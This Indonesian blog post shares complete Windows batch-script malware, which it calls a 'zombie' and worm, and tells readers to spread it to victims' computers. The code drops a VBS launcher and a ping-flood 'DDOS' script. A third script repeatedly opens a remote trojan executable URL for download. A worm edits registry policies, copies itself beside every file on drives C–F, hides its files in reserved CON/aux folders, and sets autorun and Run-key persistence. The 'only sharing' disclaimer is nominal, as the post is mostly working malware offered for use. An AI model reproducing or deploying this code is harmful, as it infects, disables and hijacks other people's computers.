Selasa, 03 Januari 2012

share ilmu

----------------------PERHATIAN----------------------
1.Jangan sekali-kali mencoba di komputer sendiri karena zombie ini untuk di komputer victim/korban.
jadi ini harus di sebar ke komputer orang lain agar menjadi wadah zombie ini jalan.

2.Cara kerjanya mudah sekali tinggal di klik zombie jalan.
efek yang bisa di lihat ketika komputer telah shutdown atau logoff

3.Ketika komputer hidup dari logoff atau shutdown zombie ini akan menciptakan 2 anakan zombie,1 worm,autorun dan 1 file pendukung untuk menjalankan 2 zombie dan 1 worm.

Anakan zombie 1 dengan nama "boot.bat" [ tanpa tanda kutip ]
untuk menyerang ip 192.168.1.1
IP-nya bisa di ganti sesuai keinginan anda mau menyerang web apa.

Anakan zombie 2 dengan nama "736F686169207761732068657265.bat" [ tanpa tanda kutip ]
berfungsi untuk mendownload file server trojan gw
yg bisa di akses di http://h1.**Forbidden**/hack02/sex.exe
jika kalian punya file server trojan sendiri bisa di tambahkan.


Terakhir 1 worm untuk penyebaran,dan pertahanan.
note: link nya kalo gk bisa gpp gan...
Spoiler for SEKALI LAGI ANE HANYA SHARE...:

Quote:
Spoiler for SOUUCE CODE:

Quote:


::Prompt di baca off::

echo off



::Memberi judul prompt::

title 736F686169207761732068657265



::Memberi warna background hitam dan tulisan hijau muda::

color 0a



::Menghapus layar Prompt::

cls



::Membuat anakan 1 dengan nama wxhshell.vbs :

echo Set wshshell = wscript.CreateObject("WScript.Shell") >>C:\windows\system32\wxhshell.vbs

echo Wshshell.run "cmd" >>C:\windows\system32\wxhshell.vbs

echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs

echo wshshell.sendkeys "echo off " >>C:\windows\system32\wxhshell.vbs

echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs

echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs

echo wshshell.sendkeys "color 0a " >>C:\windows\system32\wxhshell.vbs

echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs

echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs

echo wshshell.sendkeys "Title sohai was here " >>C:\windows\system32\wxhshell.vbs

echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs

echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs

echo wshshell.sendkeys "mode 33,10 " >>C:\windows\system32\wxhshell.vbs

echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs

echo wshshell.sendkeys "cls " >>C:\windows\system32\wxhshell.vbs

echo Wshshell.SendKeys "{ENTER} " >>C:\windows\system32\wxhshell.vbs

echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs

echo wshshell.sendkeys "::Your" >>C:\windows\system32\wxhshell.vbs

echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs

echo wshshell.sendkeys " Computer" >>C:\windows\system32\wxhshell.vbs

echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs

echo wshshell.sendkeys " Is" >>C:\windows\system32\wxhshell.vbs

echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs

echo wshshell.sendkeys " Not" >>C:\windows\system32\wxhshell.vbs

echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs

echo wshshell.sendkeys " Secure::" >>C:\windows\system32\wxhshell.vbs

echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs

echo wshshell.sendkeys "::I " >>C:\windows\system32\wxhshell.vbs

echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs

echo wshshell.sendkeys "Will" >>C:\windows\system32\wxhshell.vbs

echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs

echo wshshell.sendkeys " Attacking" >>C:\windows\system32\wxhshell.vbs

echo wscript.sleep 400 >>C:\windows\system32\wxhshell.vbs

echo wshshell.sendkeys " Your" >>C:\windows\system32\wxhshell.vbs

echo wshshell.sendkeys " Gateway::" >>C:\windows\system32\wxhshell.vbs

echo Wshshell.SendKeys "{ENTER}" >>C:\windows\system32\wxhshell.vbs

echo Wshshell.run "C:\windows\system32\boot.bat" >>C:\windows\system32\wxhshell.vbs

echo Wshshell.run "C:\windows\system32\736F686169207761732068657265. bat" >>C:\windows\system32\wxhshell.vbs

echo Wshshell.run "C:\boot.bat" >>C:\windows\system32\wxhshell.vbs

echo Wshshell.run "D:\boot.bat" >>C:\windows\system32\wxhshell.vbs

echo Wshshell.run "E:\boot.bat" >>C:\windows\system32\wxhshell.vbs

echo Wshshell.run "F:\boot.bat" >>C:\windows\system32\wxhshell.vbs

echo Wshshell.run "C:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs

echo Wshshell.run "D:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs

echo Wshshell.run "E:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs

echo Wshshell.run "F:\CON\7461737961.bat" >>C:\windows\system32\wxhshell.vbs

echo Wshshell.run "C:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs

echo Wshshell.run "D:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs

echo Wshshell.run "E:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs

echo Wshshell.run "F:\aux\736F686169207761732068657265.bat" >>C:\windows\system32\wxhshell.vbs



::Membuat anakan Zombie 1 dengan nama boot.bat dan memmiliki fungsi untuk DDOS::

echo echo off >>C:\windows\system32\boot.bat

echo title 0x44444F5320762C736F686169 >>C:\windows\system32\boot.bat

echo mode 67,16 >>C:\windows\system32\boot.bat

echo color 0c >>C:\windows\system32\boot.bat

echo cls >>C:\windows\system32\boot.bat

echo DOS >>C:\windows\system32\boot.bat

echo echo Attacking Server 192.168.1.1 >>C:\windows\system32\boot.bat

echo ping 192.168.1.1 -i 100000 -t >nul >>C:\windows\system32\boot.bat

echo goto DDOS >>C:\windows\system32\boot.bat

"belum selesai gan script nya lihat postingan yg bawah ...


nb : walaupun script di atas nampak smiley2nya.. langsung saja copy script diatas ke notepad kemudian save as dengan ekstensi .bat


Catatan : yang mau meyalah gunakan tanggung resiko sendiri ya gan...

Quote:
sekali lagi ane hanya share jadi jangan di ya gan.

Spoiler for LANJUTAN SCRIPT NYA ...:

Quote:
::Membuat anakan Zombie 2 dengan nama 736F686169207761732068657265.bat tolong bahasa hexa ini JANGAN di ubah::

echo echo off >>C:\windows\system32\736F686169207761732068657265 .bat

echo color 0a >>C:\windows\system32\736F686169207761732068657265 .bat

echo cls >>C:\windows\system32\736F686169207761732068657265 .bat

echo :736F686169207761732068657265 >>C:\windows\system32\736F686169207761732068657265 .bat

::connect ke ripway untuk mendownload file sex.exe::

echo start firefox "http://h1.**Forbidden**/hack02/sex.exe" >>C:\windows\system32\736F686169207761732068657265 .bat

echo goto 736F686169207761732068657265 >>C:\windows\system32\736F686169207761732068657265 .bat



::Membuat pertahanan untuk worm 7461737961.bat berbentuk folder::

MD\\.\\C:\CON

MD\\.\\D:\CON

MD\\.\\E:\CON

MD\\.\\F:\CON



::membuat pertahhanan untuk zombie2 berbentuk folder aux::

MD\\.\\C:\aux

MD\\.\\D:\aux

MD\\.\\E:\aux

MD\\.\\F:\aux



::Membuat Worm1 di tambah fungsi manipulasi regedit,dan penyebaran::

echo echo off >>C:\CON\7461737961.bat

echo cls >>C:\CON\7461737961.bat

echo color oa >>C:\CON\7461737961.bat

::Fungsi manipulasi::

echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer /V "NoRun" /t REG_DWORD /d 00000001 >>C:\CON\7461737961.bat

echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer /V "NoLogOff" /t REG_BINARY /d 01000000 >>C:\CON\7461737961.bat

echo REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer /V "NoStartMenuMorePrograms" /t REG_DWORD /d 00000001 >>C:\CON\7461737961.bat

echo REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /d "S.O.H.A.I Was Here" /f >>C:\CON\7461737961.bat

echo REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /d "Hack by S.O.H.A.I" >>C:\CON\7461737961.bat

::Penyebaran::

echo For /R C":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat

echo For /R D":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat

echo For /R E":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat

echo For /R F":\" /C %%a in (*) do copy %0 "%%~fa\%%~nxa.sohai" >>C:\CON\7461737961.bat



::Membuat C:\windows\system32\boot.bat tercopy pada drive C D E F ::

copy "C:\windows\system32\boot.bat" "C:\boot.bat"

copy "C:\windows\system32\boot.bat" "D:\boot.bat"

copy "C:\windows\system32\boot.bat" "E:\boot.bat"

copy "C:\windows\system32\boot.bat" "F:\boot.bat"



::Membuat C:\CON\7461737961.bat tercopy pada folder CON D E F ::

copy "C:\CON\7461737961.bat" "D:\CON\7461737961.bat"

copy "C:\CON\7461737961.bat" "E:\CON\7461737961.bat"

copy "C:\CON\7461737961.bat" "F:\CON\7461737961.bat"



::Membuat C:\CON\7461737961.bat tercopy pada folder aux D E F ::

copy "C:\windows\system32\736F686169207761732068657265. bat" "C:\aux\736F686169207761732068657265.bat"

copy "C:\windows\system32\736F686169207761732068657265. bat" "D:\aux\736F686169207761732068657265.bat"

copy "C:\windows\system32\736F686169207761732068657265. bat" "E:\aux\736F686169207761732068657265.bat"

copy "C:\windows\system32\736F686169207761732068657265. bat" "F:\aux\736F686169207761732068657265.bat"



:::membuat C:\windows\system32\736F686169207761732068657265.b at tercopy pada folder C D E F ::

copy "C:\windows\system32\736F686169207761732068657265. bat" "C:\aux\736F686169207761732068657265.bat"

copy "C:\windows\system32\736F686169207761732068657265. bat" "D:\aux\736F686169207761732068657265.bat"

copy "C:\windows\system32\736F686169207761732068657265. bat" "E:\aux\736F686169207761732068657265.bat"

copy "C:\windows\system32\736F686169207761732068657265. bat" "F:\aux\736F686169207761732068657265.bat"



::Membuat boot.bat , 736F686169207761732068657265.bat dan 7461737961.bat pada drive C terhidden ::

Attrib +r +h C:\windows\system32\boot.bat

Attrib +r +h C:\windows\system32\736F686169207761732068657265.b at

Attrib +r +h C:\CON\7461737961.bat

Attrib +r +h D:\CON\7461737961.bat

Attrib +r +h E:\CON\7461737961.bat

Attrib +r +h F:\CON\7461737961.bat

Attrib +r +h C:\boot.bat

Attrib +r +h D:\boot.bat

Attrib +r +h E:\boot.bat

Attrib +r +h F:\boot.bat

Attrib +r +h C:\aux\736F686169207761732068657265.bat

Attrib +r +h D:\aux\736F686169207761732068657265.bat

Attrib +r +h E:\aux\736F686169207761732068657265.bat

Attrib +r +h F:\aux\736F686169207761732068657265.bat



::Membuat file autorun.inf di drive C dan memiliki Arti = Virus Membuat File Autorun Agar Virus bisa Berjalan Secara Otomatis::

echo [Autorun] >> C:\autorun.inf

echo shellexecute=boot.bat >> C:\autorun.inf



::Mengcopy salinan autorun.inf pada drive C ke semua drive D E F::

Copy "C:\autorun.inf" "D:\autorun.inf"

Copy "C:\autorun.inf" "E:\autorun.inf"

Copy "C:\autorun.inf" "F:\autorun.inf"



::Membuat file autorun ter hidden dari drive C D E F ::

Attrib +r +h C:\autorun.inf

Attrib +r +h D:\autorun.inf

Attrib +r +h E:\autorun.inf

Attrib +r +h F:\autorun.inf



::Proses auto running file zombie dan worm::

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v wxhshell /t REG_SZ /d C:\windows\system32\wxhshell.vbs /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot /t REG_SZ /d C:\windows\system32\boot.bat /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot1 /t REG_SZ /d C:\boot.bat /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot2 /t REG_SZ /d D:\boot.bat /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot3 /t REG_SZ /d E:\boot.bat /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v boot4 /t REG_SZ /d F:\boot.bat /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F686169207761732068657265 /t REG_SZ /d C:\windows\system32\736F686169207761732068657265.b at /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572651 /t REG_SZ /d C:\aux\736F686169207761732068657265.bat /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572652 /t REG_SZ /d D:\aux\736F686169207761732068657265.bat /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572653 /t REG_SZ /d E:\aux\736F686169207761732068657265.bat /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 736F6861692077617320686572654 /t REG_SZ /d F:\aux\736F686169207761732068657265.bat /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 7461737961 /t REG_SZ /d C:\CON\7461737961.bat /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379612 /t REG_SZ /d D:\CON\7461737961.bat /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379613 /t REG_SZ /d E:\CON\7461737961.bat /f

reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v 74617379614 /t REG_SZ /d F:\CON\7461737961.bat /f


selamat mencoba :D seo

Tidak ada komentar:

Posting Komentar

Komentarlah yg baik dan benar no sara :) !!!